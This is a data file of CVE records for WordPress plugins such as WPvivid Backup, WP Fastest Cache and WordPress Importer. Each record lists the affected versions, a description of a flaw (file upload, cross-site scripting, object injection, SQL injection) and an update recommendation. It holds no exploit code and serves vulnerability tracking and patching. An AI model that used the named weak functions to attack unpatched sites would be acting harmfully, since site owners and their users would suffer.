{"CVE_ID":"CVE-2020-36842","slug":"wpvivid-backuprestore","versionImpact":"0.9.35","versionEndExcluding":"0.9.36","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the wpvivid_upload_import_files and wpvivid_upload_files AJAX actions that allows low-level authenticated attackers to upload zip files that can be subsequently extracted. This affects versions up to, and including 0.9.35.","recommendation":"Update to version 0.9.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de1da248-2e03-40fa-8997-7176dc06abc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de1da248-2e03-40fa-8997-7176dc06abc9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"name\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36835","slug":"wpvivid-backuprestore","versionEndExcluding":"0.9.36","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to sensitive information disclosure of a WordPress site's database due to missing capability checks on the wp_ajax_wpvivid_add_remote AJAX action that allows low-level authenticated attackers to send back-ups to a remote location of their choice for review. This affects versions up to, and including 0.9.35.","recommendation":"Update to version 0.9.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c3f8bc-fc41-4ba7-b9f2-8873203d5794?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c3f8bc-fc41-4ba7-b9f2-8873203d5794?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"name\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1383","slug":"wpvivid-backup-mainwp","versionImpact":"0.9.32","versionEndExcluding":"0.9.33","description":"The WPvivid Backup for MainWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 0.9.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.9.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backup-mainwp\\\/trunk\\\/wpvivid-backup-mainwp.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backup-mainwp\\\/trunk\\\/wpvivid-backup-mainwp.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11873","slug":"glomex-oembed","versionImpact":"0.9.1","versionEndExcluding":"0.9.2","description":"The glomex oEmbed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glomex_integration' shortcode in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/glomex-oembed\\\/tags\\\/0.9.1\\\/internals\\\/OembedGlomexIntegrationShortcode.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/glomex-oembed\\\/tags\\\/0.9.1\\\/internals\\\/OembedGlomexIntegrationShortcode.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5961","slug":"wpvivid-backuprestore","versionImpact":"0.9.116","versionEndExcluding":"0.9.117","description":"The Migration, Backup, Staging \u2013 WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.","recommendation":"Update to version 0.9.117, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5961\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5961\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320877\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320877\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5961\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5961\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ceb4a1-9354-4ed3-9a8f-45ba2057a810?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ceb4a1-9354-4ed3-9a8f-45ba2057a810?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13869","slug":"wpvivid-backuprestore","versionImpact":"0.9.112","versionEndExcluding":"0.9.113","description":"The Migration, Backup, Staging \u2013 WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_files' function in all versions up to, and including, 0.9.112. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.","recommendation":"Update to version 0.9.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-13869\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-13869\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242904\\\/wpvivid-backuprestore\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242904\\\/wpvivid-backuprestore\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2024-13869\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2024-13869\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0082e46d-fdbe-4ab7-bba3-0681a25d4495?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0082e46d-fdbe-4ab7-bba3-0681a25d4495?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10962","slug":"wpvivid-backuprestore","versionImpact":"0.9.107","versionEndExcluding":"0.9.108","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 0.9.107 via deserialization of untrusted input in the 'replace_row_data' and 'replace_serialize_data' functions. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must create a staging site to trigger the exploit.","recommendation":"Update to version 0.9.108, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4eba78-29f2-4357-ab3c-7bc3c20e0e75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4eba78-29f2-4357-ab3c-7bc3c20e0e75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186082\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186082\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7315","slug":"wpvivid-backuprestore","versionImpact":"0.9.105","versionEndExcluding":"0.9.106","description":"The Migration, Backup, Staging WordPress plugin before 0.9.106 does not use sufficient randomness in the filename that is created when generating a backup, which could be bruteforced by attackers to leak sensitive information about said backups.","recommendation":"Update to version 0.9.106, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/456b728b-a451-4afb-895f-850ddc4fb589\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/456b728b-a451-4afb-895f-850ddc4fb589\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10119","slug":"view-all-posts-pages","versionImpact":"0.9.0","versionEndExcluding":"0.9.1","description":"A vulnerability, which was classified as problematic, has been found in View All Posts Page Plugin up to 0.9.0 on WordPress. This issue affects the function action_admin_notices_activation of the file view-all-posts-pages.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 0.9.1 is able to address this issue. The patch is named bf914f3a59063fa4df8fd4925ae18a5d852396d7. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-233363.","recommendation":"Update to version 0.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/view-all-posts-pages\\\/commit\\\/bf914f3a59063fa4df8fd4925ae18a5d852396d7\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/view-all-posts-pages\\\/commit\\\/bf914f3a59063fa4df8fd4925ae18a5d852396d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.233363\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.233363\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233363\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233363\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36836","slug":"wp-fastest-cache","versionEndExcluding":"0.9.0.3","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.","recommendation":"Update to version 0.9.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82f80916-37ab-4c5a-9787-2544c620acac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82f80916-37ab-4c5a-9787-2544c620acac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wearetradecraft.com\\\/advisories\\\/tc-2020-0001\\\/\",\"name\":\"https:\\\/\\\/wearetradecraft.com\\\/advisories\\\/tc-2020-0001\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2235160\\\/wp-fastest-cache\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2235160\\\/wp-fastest-cache\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10124","slug":"most-popular-posts-widget-lite","versionImpact":"0.8","versionEndExcluding":"0.9","description":"A vulnerability was found in Most Popular Posts Widget Plugin up to 0.8 on WordPress. It has been classified as critical. Affected is the function add_views\/show_views of the file functions.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. Upgrading to version 0.9 is able to address this issue. The patch is identified as a99667d11ac8d320006909387b100e9a8b5c12e1. It is recommended to upgrade the affected component. VDB-241026 is the identifier assigned to this vulnerability.","recommendation":"Update to version 0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241026\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241026\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/most-popular-posts-widget-lite\\\/commit\\\/a99667d11ac8d320006909387b100e9a8b5c12e1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/most-popular-posts-widget-lite\\\/commit\\\/a99667d11ac8d320006909387b100e9a8b5c12e1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.241026\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.241026\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12628","slug":"bodi0s-easy-cache","versionImpact":"0.8","versionEndExcluding":"0.9","description":"The bodi0`s Easy cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cache-folder' parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153314%40bodi0s-easy-cache&new=3153314%40bodi0s-easy-cache&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153314%40bodi0s-easy-cache&new=3153314%40bodi0s-easy-cache&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.getastra.com\\\/blog\\\/cms\\\/stored-xss-vulnerability-in-bodi0\\\/\",\"name\":\"https:\\\/\\\/www.getastra.com\\\/blog\\\/cms\\\/stored-xss-vulnerability-in-bodi0\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6994","slug":"list-category-posts","versionImpact":"0.89.3","versionEndExcluding":"0.89.4","description":"The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catlist' shortcode in all versions up to, and including, 0.89.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.89.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/611871cc-737f-44e3-baf5-dbaa8bd8eb81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/611871cc-737f-44e3-baf5-dbaa8bd8eb81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/include\\\/lcp-wrapper.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/include\\\/lcp-wrapper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/list-category-posts.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/list-category-posts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018689%40list-category-posts&new=3018689%40list-category-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018689%40list-category-posts&new=3018689%40list-category-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5292","slug":"acf-extended","versionImpact":"0.8.9.3","versionEndExcluding":"0.8.9.4","description":"The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acfe_form' shortcode in versions up to, and including, 0.8.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.8.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.4\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.4\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbe0c72-d518-45d3-a220-896a51071b26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbe0c72-d518-45d3-a220-896a51071b26?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.3\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.3\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2972880\\\/acf-extended#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2972880\\\/acf-extended#file4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9629","slug":"cf7-telegram","versionImpact":"0.8.5","versionEndExcluding":"0.8.6","description":"The Contact Form 7 + Telegram plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wpcf7_Telegram::ajax' function in versions up to, and including, 0.8.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to approve, pause and refuse subscriptions.","recommendation":"Update to version 0.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-telegram\\\/tags\\\/0.8.4\\\/classes\\\/wpcf7telegram.php#L537\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-telegram\\\/tags\\\/0.8.4\\\/classes\\\/wpcf7telegram.php#L537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176353\\\/cf7-telegram#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176353\\\/cf7-telegram#file21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0177","slug":"like-box","versionEndExcluding":"0.8.41","description":"The Social Like Box and Page by WpDevArt WordPress plugin before 0.8.41 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/712c2154-37f4-424c-ba3b-26ba6aa95bca\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/712c2154-37f4-424c-ba3b-26ba6aa95bca\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13889","slug":"wordpress-importer","versionImpact":"0.8.3","versionEndExcluding":"0.8.4","description":"The WordPress Importer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 0.8.3 via deserialization of untrusted input in the 'maybe_unserialize' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 0.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L602\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L602\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L857\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L857\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L975\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L975\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261419\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261419\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f0795f7-6eba-4ff0-b0da-5d2b544adf14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f0795f7-6eba-4ff0-b0da-5d2b544adf14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
